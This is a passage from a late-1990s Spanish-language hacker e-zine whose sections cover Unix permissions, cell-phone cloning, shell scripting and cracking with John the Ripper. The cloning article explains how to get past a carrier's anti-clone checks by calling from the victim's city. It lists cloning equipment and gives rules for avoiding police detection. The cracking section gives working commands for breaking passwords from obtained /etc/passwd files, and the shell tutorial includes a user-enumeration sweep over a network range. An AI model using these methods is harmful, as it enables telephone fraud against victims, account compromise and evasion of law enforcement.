  Bill tambi‚n robo para su NT... El proposito de los permisos de archivo es
  darte control sobre los archivos que tu puedes leer, ejecutar o modificar...

  El due¤o (del archivo) o el Root son los unicos que pueden cambiar los
  permisos con el comando #chmod , hay tres grupos principales donde se
  aplican los permisos, y estos son Due¤o y Root, Grupo, Mundo.

  EJM: -rwxrw-r-- 1 derr 0 Jul 2 18:55 file1
  Ok, Tenemos 10 campos, el primero nos dice si es archivo o directorio y
  los restantes 9 (rwxrwxrwx) son los Permisos propiamente dichos; (r= Read,
  w= Write, x= eXecute). Si nos aparece un gui¢n (-) en determinado campo,
  eso quiere decir que el permiso para esa acci¢n est  restringido; ya sabemos
  que cada grupo (owner-root, group, world) posee tres permisos (rwx) por
  eso se repite tres veces (rwxrwxrwx) (una para cada grupo, empezando por
  el mas alto nivel) en el ejemplo anterior tenemos que: Tratamos con un
  archivo porque el primer campo es un gui¢n (-) , luego vienen los permisos
  para el due¤o del archivo y Root (en el ejemplo, aparece rwx, (full
  permisos), el due¤o puede leer, modificar y ejecutar el archivo), vamos
  a hora con el Grupo, supongamos que tu tines una poderosa estaci¢n Unix
  y que le vas a dar cuentas a tus Panas de HV, adem s vas a dar un poco
  de Free-shell (restringido) a quienes quieran aprender *nix, bien, vas
  a querer que tus panas tengan mas privilegios que el resto de la gente,
  por lo tanto creas un Grupo :) por ejemplo: editas el archivo etc/group
  y a¤ades el Grupo "hackven" quedar  algo asi:

hackven:#$:hackven:0:root,kliber,darkdeath,merlin, etc.

  Algunos grupos:

bin::1:root,bin,daemon
daemon::2:root,bin,daemon,majordomo
sys::3:root,bin,adm
adm::4:root,adm,daemon

  Notaran que cada grupo tiene asignado un numero, eso es el "group ID"
  (GID), root es del GID 0. Para ver que GID te corresponde en un Shell
  tipeas el comando #id, para ver quien mas est  en tu grupo, tipeas:

#grep (nombre del grupo) etc/group

  Chmod nos sirve para cambiar los permisos, el trabaja en una forma Octal,
  recuerden: r=4 w=2 r=1 ; veamoslo de esta manera:

rwxrwxrwx
412412412

  Ahora bien, vamos a cambiar los permisos para el archivo exploit.c para
  que tu como due¤o del archivo tengas full permisos (rwx), para que los
  miembros de tu grupo puedan leerlo y ejecutarlo pero no modificarlo (r-x),
  y para que el resto del mundo ni lo vea ni lo ejecute ni n  (---)...
  Tenemos que en el primer grupo (rwx) esto es: 4+2+1 = 7 por lo tanto el
  primer numero para el comando chmod es 7 , luego tenemos (r-x) 4+0+1 = 5
  y (---) 0+0+0= 0 el comando para modificar de esta manera el permiso es:

#chmod 750 exploit.c

Y as¡ vamos, full permisos es 777 etc. practica un poco y le coger s el
truquito...


   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹  Clonaci¢n y Telefonia Celular  ÌÍÍÍÍÍÍÍÍÍÍÍÍÍ͹VeN tHe KiLlEr RaT!ÌÍÍÍÍÍ
   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
              
              \    /
               \  /
                \/ e N tHe KiLlEr RaT! - Klonacion C-Lular
                ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
                                 ____ ÷÷
                              ~~(÷÷ ÷÷§§>

                       Sistema Anti-Klon de Movilnet
                       ÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍ ÍÍ ÍÍÍÍÍÍÍÍ

  Cuando comenzo el BOOM de los telefonos celulares, TELCEL y Movilnet
  empezaron a luchar por el mercado, cada cual con sus ventajas analogicas
  para aquel entonces, posteriormente Telcel logra una mayor cobertura en el
  pais y mas adelante aparece Movilnet con mayor cobertura internacional, en
  fin, la eterna lucha por el poder.

  Posteriormente a eso, surgen los problemas tipicos de cualquier actividad,
  aparecen los famosos "klonadores", y la gente se preocupa preguntandose
  como lo hacen?, para que lo hacen?, etc, etc. Entonces Movilnet, que esta
  asociada con CANTV, lanza al mercado el internacionalmente famoso Anti-Klon.
  Empieza una larga campa¤a de concientizacion e informacion para todos los
  usuarios con la finalidad de vacunar el celular para prevenir la klonacion,
  hecho que como veremos mas adelante es IMPOSIBLE de impedir.
 
  Ahora bien, este sistema de Anti-Klon fue utilizado en los Estados Unidos
  y en Jap¢n desde que salieron los celulares, ya que los mismos eran
  re-programados para cambiar el serial electronico y asi generar un "klone",
  pero... Como funciona?, Que pasa en Venezuela con eso?.
  
  El sistema de Anti-Klone no es mas que un software que se encarga de
  comparar la residencia o el domicilio del verdadero usuario del celular y
  registrar todas las llamadas que realiza, asi como controlar el roaming, y
  conocer donde se encuentra realmente y asegurar que no es un klone. En la
  practica compara la hora en que se emitio la llamada y detecta si por
  ejemplo la victima llamo a la 1:45PM desde Caracas y luego llamo a la
  1:50PM desde Maracay, el sistema anula automaticamente al klone, y NO
  factura la llamada al verdadero usuario, es decir la victima. Se lee
  super convincente, ehhh????. Bueno, el error de este sistema esta en que
  si la victima (Entiendase "verdadero usuario"), se encuentra en la misma
  ciudad del klonador el sistema NO detecta el klone, por eso se hace
  indetectable por el sistema y puede realizar las llamadas que desee, sin
  embargo, Movilnet tiene un Triple-Anti-Klon, Cuadruple, Quintuple, Doble,
  y otros tipos de vacunas para hacer creerle a la victima que mientras mas
  alto sea el numero mas protegido esta, jejejeje, en realidad es una excusa
  para cobrarle mas por el servicio y por el celular, porque es imposible que
  el sistema este vigilando doble o 3 veces mas a la persona, el fulano
  "anti-klon" solo a¤ade a la victima a una lista de revision y de rastreo,
  para verificar si alguien con el mismo numero de celular esta llamando desde
  otra ciudad, por eso no puede vigilar mas veces, sino el sistema de Movilnet
  estaria colapsado y adem s es anti-pr ctico, es solo una estrategia
  COMERCIAL, es decir, hacen dinero a costillas de los "klonadores" que en el
  fondo son mas honestos que dicha empresa de telefonia celular.

  Espero que todo este claramente visto y leido, si no entiendes muy bien,
  te voy a explicar con unos ejemplos:


  El verdadero celular    es: victima
  El # de celular klonado es: venkiller

  Ejemplo #1: 
 
  La victima esta en Caracas el Lunes 19 de Abril de 1999, y realiza una
  llamada a las 7:45 PM a valencia, luego minutos mas tarde a las 8:00 PM
  venkiller realiza una llamada a japon desde su casa en Margarita.

  En ese instante el sistema de Movilnet verifica el numero de celular
  y cuando detecta que venkiller tiene un numero igual al de la victima
  autom ticamente prohibe a venkiller llamar y se produce un tono de
  "ocupado" y es imposible llamar, en otros casos se puede realizar la
  llamada a japon y la conversacion es grabada para colocar a venkiller
  tras las rejas por klonador, el unico problema, es que la conversacion
  es en japones y la PTJ no entiende nada de japones, por eso es importante
  conocer el sistema.


  Ejemplo #2:

  La victima esta en el Sambil, Caracas - Venezuela a las 2:45 PM del
  25 de Abril de 1999 y se le ocurre llamar a Margarita para preguntarle
  a irene a ver si va a votar por el "Doble SI" en el referendum, minutos
  mas tarde a las 3:30 PM venkiller esta en La Cascada - Area Metropolitana
  (Caracas) porque el sambil le parece una cagada y se dispone a comprar una
  pila nueva para su celular elite porque estan en ofertas, tambien aprovecha
  y compra otras para el star tac, pero se da cuenta que un pana las habia
  comprado en el mercado negro mas baratas, por eso, se dispone a llamar
  a las 3:45 PM. a Mr. Hide que esta en San Antonio de los Altos.
 
  Simultaneo a esto el sistema de Movilnet cree que venkiller es la victima
  y permite que venkiller complete la llamada y ademas le sale GRATIS, y
  sin mayor dificultad.


  Ejemplo #3:

  La v¡ctima esta en alguna sucursal de Movilnet en Caracas reclamando por el
  mal servicio, y venkiller esta en Guarenas paseando para matar el tiempo,
  en ese instante la victima realiza una llamada al 02-208.11.11 desde su
  celular Movilnet a las 9:15 AM para cambiarse a Telcel, en ese instante a
  las 9:16 AM a venkiller tambien se le ocurre llamar, y BINGO!, el sistema
  lo deja llamar libre y feliz, aunque fue una casualidad "casualmente
  casual".

  -Fin de los Ejemplos-

  Bueno, eso fueron los tres ejemplos de los casos m s comunes cuando se
  llama desde un klonado que tiene "anti-klon", por eso es importante
  conocer donde esta la victima para poder realizar la llamada con anti-klon
  y super anti-klon, tambien es importante tener en cuenta las reglas y
  riesgos para llamar desde un celular klonado, tal como lo explique en el
  Tutorial de Klonaci¢n C-lular. Sin embargo, a las personas que NO
  acostumbran viajar y que permanecen en una misma ciudad se les puede klonar
  el celular mientras no se muevan de ciudad, ese es un error que aunque lean
  este art¡culo NUNCA lo podr n solucionar al menos que CAMBIEN el sistema
  tan obsoleto que utilizan. Que tarrrco?

  Para finalizar este punto les informo que en el 2000 ademas de detenerse
  las PC's viejas que manejan fechas tambien se acabar  el jueguito de
  telcel y Movilnet porque viene una nueva empresa de telefon¡a celular, si
  quieren detalles escriban en www.el-nacional.com la palabra clave "telcel"
  para que lean el art¡culo.

  ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
  A) ¨Pero qu‚ es exactamente clonar o clonacion?
  B) ¨Como funciona?
  C) ¨Que sistemas de seguridad tiene?
  ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

  A) Klonar no es mas que copiar el ESN (Serial Electronico) de un celular
  a otro celular, existiendo 2 iguales en el mismo planeta, hecho que es
  imposible a menos que el celular sea cloneado.

  B) Se adquiere por una de tantas formas el ESN del celular y posteriormente
  se agrega en otro celular borrando su serial electronico.

  C) Mmmm....ya lo explique en la Parte de arriba, el fulano "Anti-Klon"
  de Movilnet (que ya me tiene arrech*) NO evita que te clonen el celular,
  ya que eso es IMPOSIBLE, NO se puede evitar una clonacion, al menos en
  los celulares viejos, es decir del ultimo modelo del Startac 6500 hacia
  abajo (en el caso de motorola). Es por eso que al encender la Radio, TV,
  o leer la prensa observamos anuncios para cambiar nuestros telefonos a
  digitales CDMA (Clonacion Denegada de los Moviles Actuales) jejeje...
  ¨Que tarrr?... es por eso que Telcel esta deseperad@ recogiendo todos
  los celulares viejos. Pero en fin, no hay una seguridad real, la unica
  medio seguridad es la de Movilnet, y ademas no garantiza nada, porque
  igual te pueden clonear, sin passwords ni nada.

  Requisitos para Clonar un Celular Desde la PC
  ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

  - Cable PC-CELULAR (agarra un cable de cargador y lo pegas a la PC)
  - Software de klonacion (lo mando en los proximos numeros...)
  - Precaucion
  - Conocer las limitaciones
  - Guardar Respaldo de lo que haces


  Cable PC-C-lular
  ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

  Este cable lo puedes construir tu mismo de muchas maneras, la mas sencilla,
  es tomar el cable que utiliza el cargador, cortarlo y hacer puente con los
  pines del puerto LPT1 de la impresora, para que el software pueda entrar
  al celular. En la p gina incluire pr¢ximamente una fotografia del cable al
  cual me refiero, en caso tal que no entiendan.

  Actualmente soportan clonaci¢n en el caso de Motorola los celulares:
  Tele-Tac 250, Micro Tac Lite II, Tango 3000, Pocket Classic 950 y todos
  los anteriores al startac 6500. Para el caso de nokia, samsung, etc..etc.,
  los modelos anteriores al a¤o 98. Yo personalmente lo he logrado con los
  modelos que describi anteriormente (Teletac, microtac...etc..). Tambi‚n
  hay que tomar en cuenta el modelo de tel‚fono celular.

  Software de Klonaci¢n
  ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

  Existen infinidades de softwares, pero yo me concentro en el motorola
  (que es el modelo que utilizo), y personalmente utilizo el Motorola 6.6,
  para los otros modelos tambi‚n existen softwares los cuales ir‚ nombrando
  luego.


  Precauci¢n
  ÍÍÍÍÍÍÍÍÍÍ

  Esto es super importante, hasta que el "klonador" no internalize que
  clonar es como tal una actividad ILEGAL, y que existen normas y aunque
  "moribundas", las leyes en Venezuela sancionan esta actividad.

  Muchas personas piensan que en Venezuela, el B.A.E., la P.T.J. u otros
  organismos de "justicia" solo comen perros calientes, y fuman tabaco,
  pero en realidad NO es as¡, creanme y si no me creen busquen el peri¢dico
  el Nacional (www.el-nacional.com) y lean acerca de "el coquito", un
  tipo  dedicado a clonar desde hace tiempo, as¡ como otros colegas
  del mundo que se dedican a esta actividad para vivir, a diferencia de mi
  persona que solo lo hace con fines de entretenimiento y educaci¢n para
  mis lectores.

  LIMITACIONES
  ÍÍÍÍÍÍÍÍÍÍÍÍ

  Un celular cloneado es ILEGAL en el momento que el verdadero due¤o, no
  tiene ning£n conocimiento acerca de la clonaci¢n de su aparato, por tanto
  hay que tener en cuenta las siguientes limitaciones, que aunque se pueden
  hacer NO se deben, al menos que quieras ir a pagar condena, o pena de
  muerte (¨que dir  la consituyente de eso?¨?...jejeje). Al menos el
  Art¡culo 2 del C¢digo Civil de la 4ta Rep£blica de Venezuela indica que:
  "la ignorancia de la ley no excusa de su cumplimiento", que en el caso de
  clonar celulares puedes ir preso aunque digas "ayyy, perd¢n, es que yo no
  sab¡a".

  Recuerden que desde un celular clonado:

  - NO se debe accesar al Telbox ¢ buz¢n de mensajes.
  - NO se deben recibir llamadas.
  - NO se debe dar informaci¢n exacta, precisa y concisa acerca de la
  direcci¢n de nuestro domicilio, ¢ nuestro nombre completo.
  - NO hacer p£blico el # del celular clonado
  - NO mantener el celular encendido al menos que sea para llamar
  - Recordar que el due¤o del # observar  todos los n£meros que llames y
  la polic¡a podr  escuchar tus llamadas para tratar de joderte.


  Guardar Respaldo de lo que haces
  ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

  La mayor¡a (por no decir todos), los celulares digitales poseen un
  sistema de protecci¢n que inyecta un virus y da¤a el software de
  clonaci¢n por eso es importante que copies el software tantas veces
  como puedas.

  Tambi‚n es importante que guardes el serial electr¢nico original del
  telefono en un lugar seguro en caso de "cancelaci¢n de la cuenta", sin
  embargo este se encuentra en una etiqueta del celular.
         
                                VeN tHe KiLlEr RaT!
                                http://pagina.de/venkiller
                                http://come.to/venkiller
                                ICQ#: 3592401
                                ==O0o0O==


                                                Chao!
   
   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹  Programaci¢n del Shell de Unix  ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹DoctorXÌÍÍÍÍÍ
   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

       El shell de unix no es simplemente el entorno en el cual se
  ejecutan los commandos del sistema, puede ser una herramienta de
  programaci¢n  muy  util para realizar  muchas  tareas  con  mayor
  facilidad. Para un Programador el shell de unix es una manera de
  practicar la programaci¢n a diario, y un hacker no esta aislado
  de la necesidad de  saber programar ademas un hacker  que no sabe 
  programar simplemente no  aprovecha  la ventaja  que  le dan  sus
  conocimientos para aplicarlos  en  su entorno  ya que tampoco nos
  podemos sentar a esperar que otro escriba los exploits.


  Declaraci¢n de Variables:
 
       Una variable es  declarada con la  sentencia export para que
  sea una  variable  del entorno  y pueda ser llamada por cualquier
  sentencia  dentro  del programa, aunque no  siempre  es necesario
  utilizar "export " en la declaraci¢n de la misma, ya que si no se
  hace  solo puede  ser utilizada por ese script en particular y no
  puede ser empleada por otros scripts  mientras  que con export si 
  se puede ademas de poder ser  utilizada con  ese mismo nombre por
  otros scripts.

Ejm:
export RED="11.11.11.11"
o simplemente
RED=11.11.11.11


       Asi tendremos una variable  del  shell con el ip de una red 
  que puede  ser  llamada  por  cualquier  instrucci¢n  dentro  del
  programa utilizando  un  "$"  antes del nombre de la misma y si
  la variable tiene alguna extensi¢n  para  no  confundir la 
  extensi¢n con  el  nombre se debe  utilizar  un corchete "{}" o sea
  se llama ${RED}old se supone que la extensi¢n es old.          
    
Ejm:  si RED=11.11.11.
y old=3
entonces  ${RED}old seria igual a 11.11.11.3

  Asignacion de Variables en la linea de comandos:      

       A menudo  se  quiere  que un programa o en nuestro caso  un
  shell script se execute con ciertos parametros iniciales que sean
  entregados desde la linea de comandos.

Ejm:

     $ sh programa.sh dato1 dato2

       Supongamos que dato1 e dato2 son los parametros de  interes
  estos seran utilizados dentro del programa refiriendose a  ellas
  en el mismo orden en que  fueron pasados  como en  nuestro  ejemplo
  jumi para dato1 y [*3] [http://www.govannom.org/e-zines/hven/hven001.txt] dato2 asi  estos datos pueden ser  manipulados,
  si el numero  del  parametro   es  mayor que un digito  se  llama 
  por  ejemplo .

Ejm :
      #!/bin/bash
      export RED=jumi
      export HOST=[*3] [http://www.govannom.org/e-zines/hven/hven001.txt]
       Telnet  $HOST ; 
      Ipfwadm  -F -a m -D $RED o ===> ipfwadm -F -a m -D jumi



       De esa forma estaremos asignandole los valores requeridos en
  la  linea de  comandos  a  variables del  entorno  del  shell 
  para  ser utilizadas  dentro de el programa. La  instrucci¢n  $# 
  devuelve la  cantidad  de  parametros  pasados  en la linea de
  comandos.

Ejm:

--------------prueba.sh------------------
#! /bin/sh
export HOST=jumi
export FUN=[*3] [http://www.govannom.org/e-zines/hven/hven001.txt]
echo "Cantidad de Parametros $#"
echo "Este es el Host: jumi"
echo "Esta es la Funcion: [*3] [http://www.govannom.org/e-zines/hven/hven001.txt]"
$FUN $HOST
--------------prueba.sh-------------------

  al ser ejecutado de esta forma: 

$sh prueba.sh foo.com ftp

  el resultado en pantalla sera :

Cantidad de Parametros 2
Este es el Host: foo.com
Esta es la Funcion: ftp

  y lo que sigue sera la conexi¢n a el ftp en foo.com
                              
  Es importante notar que $# nos dice la cantidad de parametros que
  fueron pasados en la llamada del script y {jumi [*3] [http://www.govannom.org/e-zines/hven/hven001.txt]} nos da el nombre del
  shell script en ejecucion.

  llamada del shell script

    $ sh prueba.sh bacteria.hven.org telnet

Resultado : 
     Cantidad de Par metros 2
     Este es el Host : bacteria.hven.org
     Esta es la Funci¢n: telnet
     Trying 127.0.0.1
     Connected to bacteria.hven.org
     ......

O la otra opcion seria
$ chmod 755 prueba.sh
$ ./prueba.sh bacteria.hven.org telnet


  es de notar que a partir del nombre del programa los parametros son
  nombrados en orden ascendente o sea jumi,[*3] [http://www.govannom.org/e-zines/hven/hven001.txt] etc ..... tantos  $ 
  como parametros, si usted hace  referencia a un  parametro  que  no
  fue pasado entonces, este sera igual a un espacio en blanco.
 
  Comandos

       Cualquier comando  o  instrucci¢n del shell como el ftp,el
  telnet o el finger es una instrucci¢n en la  programaci¢n del shell
  de unix, lo cual nos da la ventaja de programar con comandos de uso
  cotidiano para un usuario de un sistema unix.
          

  source :lee y ejecuta lineas de comandos desde otro archivo.


  []: en una condici¢n if significa test o sea si se cumple produce
  una respuesta que es igual a la verificaci¢n del if sobre la condici¢n.
                                                  

  Pipeline o  tuberia  son  una  lista  de comandos separados por el
  caracter "|" los cuales se ejecutan de forma sucesiva.

  read : se  utiliza para  leer datos de pantalla y asignarlos  a
  una variable.

Ejm:
RED=
read RED

  Estructuras de Programaci¢n:
  
if

if condici¢n1 then lista_de_comandos1 [elseif condici¢n2 then 
lista_de_comandos2 ] ....... [else lista_de_comandos_n ] fi

  la ultima condici¢n no tiene elseif si no else, y el if se
  cierra con fi. Las condiciones son las cosas que deben ocurrir
  para que se ejecute la lista de comandos, en este caso si se
  cumple la condici¢n1 entonces se ejecuta la lista de comandos 1
  y asi sucesivamente.

  Case

  An logo al swicht de lenguaje C, al Select Case de Visual Basic o
  al case de pascal el case del shell permite comparar una
  condici¢n con una serie de valores.

  Ejm:

  case palabra in [ patron1 [\patron2]....) Lista_de_comandos
  ;;[......... 
  esac

  nota: el case se cierra con esac, case alreves.

  los patrones pueden ser valores algo asi como si X es gual a 1,2
  o 3 haga tal cosa, pero tambi‚n se pueden tener varios patrones
  separados por ";" para asi colocar varias condiciones.
                                                            
Ejm:
case $# in 0) echo "Faltan Par metros" ;;
           1) echo "Falta Algo" ;;
           2) echo "Par metros Completos" ;
esac

  de esta manera si al programa no se le pasan par metros entonces
  escribe en pantalla "Faltan Par metros" , si se le pasa un solo
  par metro muestra en pantalla un mensaje "Falta Algo" y si se le
  pasan  dos  entonces  muestra  un  mensaje  en  pantalla  igual a
  "Par metros Completos" mas obvio su uso no puede ser.

  Select
 
  Esta estructura se utiliza para interactuar con el usuario, de
  esta forma el mismo puede colocar las opciones que desee o pasar
  los par metros que desee de manera interactiva y la respuesta se
  guarda  en  una variable  que  se  va  procesando  para  el  uso
  predeterminado por el programa,  o sea se pueden utilizar opciones
  y de acuerdo a ellas solicitar parametros al usuario,  la opci¢n
  escogida se guarda autom ticamente en la variable REPLY del shell
  por si se necesita saber mas adelante que opci¢n fue la ultima que
  fue elegida, y si  no  se  le  da  en la  estructura  del select
  caracteres pasados entre "[ ]" entonces estos parametros ser n
  tomados  de  la  linea  de  comandos. Y  esta  se  ejecutar 
  indefinidamente hasta que se encuentre con un break o un return.


  Sintaxis: select variable [in conjunto ] ;do lista ;done 

  Test                                                   

  Este comando te sirve para verificar una expresi¢n simple o
  puede ser binaria.

Ejm: test expresi¢n

  algunas expresiones son:

  -b archivo: verdadero si el archivo existe y es un dispositivo
  de bloques.

  -c archivo: verdadero si el archivo existe y es un archivo de
caracteres

  -d archivo : verdadero si el archivo existe y es un directorio 
  -g archivo : verdadero si el archivo existe y tiene activado el
  "group-id" o identificador de grupo

  El resto de las condiciones estan en las patinas del man son
  muchas para describirlas, para poder verlas utilizar  $man bash'

  Este comando pede ser de mucha utilidad ya que con el se podria
  saber si un archivo es ejecutable o no lo cual seria de buen uso
  en un shell script.
                    

  Estructuras Iterativas

  While y until

while lista1 do lista2 done
until lista1 do lista2 done

  estos comandos se ejecutan mientras la lista1 (o condiciones) se
  cumpla, en el caso del while significa mientras ocurra esto
  realice lista2, donde lista2 puede ser una lista de comandos, y
  en el caso de el until significa ejecuto lista2 hasta que se cumpla
  lista1, la secuencia de instrucciones encerradas por un until o
  un while ser n continuamente ejecutadas hasta que se cumplan sus
  respectivas condiciones.

  Ciclo For

for variable in lista ;do lista1 done

  Esta instrucci¢n simplemente hace variar a la variable del
  argumento con todos los valores contenidos en lista y ejecuta
  para cada uno de ellos las instrucciones que estan en lista2.

Ejemplo:

#!/bin/bash
RED=140.149.44.
for HOST in 1 2 3 4 5 6 7 8 9 10 11 12 13 14;
do
  rusers -al ${RED}HOST >> loged.txt 
done

  Con este peque¤o shell script estaras obteniendo una lista de
  los usuarios conectados en las maquinas de la RED 140.149.44
  cuyos IPs son utilizados en este script desde el 1 al 14, el
  resultado sera depositado en un archivo llamado loged.txt.

  Funciones:

  Las funciones tienen por objeto dividir problemas grandes en
  peque¤os y a su vez si estos se repiten a cada rato tener una
  rutina para resolverlos que pueda ser llamada varias veces sin
  necesidad de escribir el codigo de la misma en cada oportunidad.
  Una caracteristica interesante de las funciones es que se le
  pueden pasar parametros en un orden distinto al que fueron
  suministrados al shell script, o sea el parametro 2 del shell
  script puede ser el primero de la funci¢n.

  Sintaxis: function nombre() {instrucciones ;}

  nombre es el nombre con el que se llamara la funci¢n.

Ejemplo:
#!/bin/bash
SCAN-PRO="/scripts/run.sh"
function scan(){ 
echo "Inicio del Scan"
$SCAN-PRO jumi [*3] [http://www.govannom.org/e-zines/hven/hven001.txt] ;}
scan [*3] [http://www.govannom.org/e-zines/hven/hven001.txt] jumi

  En este caso supongamos que tenemos un shell script para hacer un
  barrido (scan) de puertos y que requiere de 2 parametros hacemos
  una funci¢n para hacer la llamada al barrido y pasarle los
  parametros al mismo pero fijense que los parametros 1 y 2 de la
  funci¢n son los parametros 2 y 1 del shell script original y en la
  llamada a la funci¢n se define el orden de los mismos.Para declarer
  variables dentro de la misma funcion se puede utilizar la sentencia
  local con ella se estaria  declarando una variable solo valida para
  el sub_shell de la funci¢n.

Ejm: local variable=valor

  Break y Return

  estas dos instrucciones se utilizan para salir de las estructuras
  for,while,until.

     break n

  se sale del ciclo y si se espefica n , salta n instrucciones.

     return n

  Cambia el valor de retorno o sea el valor que se necesita para
  salir del ciclo de donde n es el nuevo valor.       

Atte                                    
DoctorX
"El Conocimiento es Poder"
Zona de Bacterias - http://bactery.8m.com
Bueno flames enviarlos a /dev/null o a /home/(whoami)
comentarios y dudas enviarlos a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
   
   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹  Analisis del John The Ripper 1.6  ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹DarKdEaTHÌÍÍÍÍ
   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

  Los passwords en un sistema UNIX generalmente se encuentran en el archivo
  /etc/passwd, estos est n muy bien encriptados, hasta no hace mucho a los
  administradores no les importaba que ese archivo sea leido por personas
  ajenas al sistema ya que crackearlos era algo casi imposible, hasta ahora
  la unica manera de crackear estos passwords es encriptando palabras de
  igual forma como lo hace el sistema e ir compar ndolas hasta dar con la
  palabra buscada, como soluci¢n a esto en algunos sistemas ocultan los
  passwords en el archivo /etc/shadow generalmente, este archivo no tiene
  permiso de lectura para todo mundo como el /etc/passwd y por eso mismo es
  mas dificil conseguirlo, ojo, dificil pero no imposible, han surgido varios
  programas para crackear estos passwords, pero sin duda el mas eficiente es
  el  John  The Ripper,  ya que  es el  mas r pido hasta  ahora,  muchos
  administradores desconocen las existencia de este tipo de programas, lo que
  es un grav¡simo error ya que al ignorar que puede hacer este programa son
  un blanco facil para un ataque del mismo, ya que hay bastante gente que
  pregunta sobre el uso del john the ripper aqui analizaremos un poco algunas
  de las posibilidades que este nos brinda.
                             
                                 Passwd   
                                 ÍÍÍÍÍÍ
                        
  Ok, ya tenemos el /etc/passwd, ¨como? bueno ese es otro tema X-D
  Que es lo primero que hacemos, pues primero vemos que sea as¡

        root:XpAxNqj.2Wh6.:0:0:root:/root:/bin/bash

  si en el lugar donde esta "XpAxNqj.2Wh6." vemos "x" o "*" entonces los
  passwords estan ocultos, eso lo veremos luego pero por ahora sigamos.

  Al ver que si est n los passwords yo recomiendo usar primero la opci¢n
  single asi

john -single passwd

  donde passwd es el archivo donde se encuentran los passwords pero puede ser
  cualquier otro nombre, asi que cuando veas passwd me estoy refiriendo al
  archivo donde se encuentran estos passwords y shadow donde estan los passes
  en caso de que esten ocultos.

  La opci¢n single personalmente es la opci¢n que saca mas passwords, ya que
  esta usa la informaci¢n que sale en el passwd sobre ese login, muchas veces,
  bueno, much¡simas veces ponen de passwords (hey anota el dato XD) el mismo
  login, o el nombre, o el apellido, etc, por ejemplo:

rhantos:RKxhLEYIi7b9o:150:2000:Roberto Hantos:/home/rhantos:/bin/csh

  donde el password encriptado es roberto, en modo single este password sale
  en mucho menos de un segundo, mas adelante le mostrare algunas cosas sobre
  esto.
  
                              Listas de Palabras       
                              ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ       
                
  Esto es muy importante si quieres crackear bastantes passwords, aunque de
  seguro no sacaras tantos passwords como en modo single, pero si es una muy
  buena opci¢n, se usa asi:

john -w:passwords.lst passwd

  aqui  estoy  usando  la lista de  palabras que  trae el john,  aqui
  podemos usar una opci¢n llamada rules, la cual a cada palabra le pone
  variaciones, como sufijos y prefijos, esta opci¢n hace que el tiempo en
  terminar sea mucho mayor que sin rules, y personalmente he sacado pocos
  passwords con esta opci¢n pero si salen ;)

john -w:passwords.lst passwd -rules

                                 Incremental       
                                 ÍÍÍÍÍÍÍÍÍÍÍ          

  Sin duda, el modo incremental es una muy buena opci¢n, ya que si no
  existiera esta opcion tuvieramos que crear listas de palabras del tipo
  aaaaaaa hasta zzzzzzz, lo que ocupa mucha memoria en el DD, ademas de
  que si vamos a incluir may£sculas y min£sculas seria peor, las opciones
  en modo incremental son las siguientes:

alpha: Genera plabras con letras solamente, osea 26 letras
digits: Genera plabras con numeros solamente, desde el 0 hasta el 9
all: Genera plabras con letras, numeros y caracteres especiales, en total
son 90 caracteres, osea se pueden imaginar lo que tardar¡a en terminar
lanman: Es como el del l0phtcrack, nunca lo he usado.

  las opciones son...

john -i:alpha passwd

  No la he visto terminar, en alpha va probando todas las palabras que se
  puedan crear hasta 8 caracteres

john -i:digits passwd

  Esta si, con un promedio de 24500 c/s mi pc claro, un pentium 233 MHz MMX
  con 32 MB de RAM un password termina en 2 horas y pico, no recuerdo bien,
  pero se descubren bastantes, mucha gente pone su numero de c‚dula de
  password que aqui en Venezuela es exactamente 8 n£meros, a menos que sea
  c‚dula de viejo que son 7.

john -i:all passwd

  Hay mucha gente que se obcesiona con un password de algun root y creen que
  ajuro lo tiene que conseguir, a ellos les digo que no se obsecionen pero
  si funciona, eso tambien depende del tipo de password y de la paciencia que
  tengas, por ejemplo una vez puse a crackear un password de root, y a los
  9 dias y 3 horas el password habia sido crackeado, restale importancia, y
  solo lo pones a trabajar cuando no estes usando el computador, a menos que
  tengas linux ya que no hay problema, esto lo digo pq si usas windows y
  estas haciendo otras tareas con el y ademas crackeando el pass te va a
  ir muy lento, el password que descubr¡ era de este estilo "1446igua"
  (sin comillas  claro ;)  claro que si el  password  hubiera sido algo
  como ",4*V4x5B" seria casi imposible crackear, quiz s el "casi" este
  de mas :(

                                 Shadow   
                                 ÍÍÍÍÍÍ   

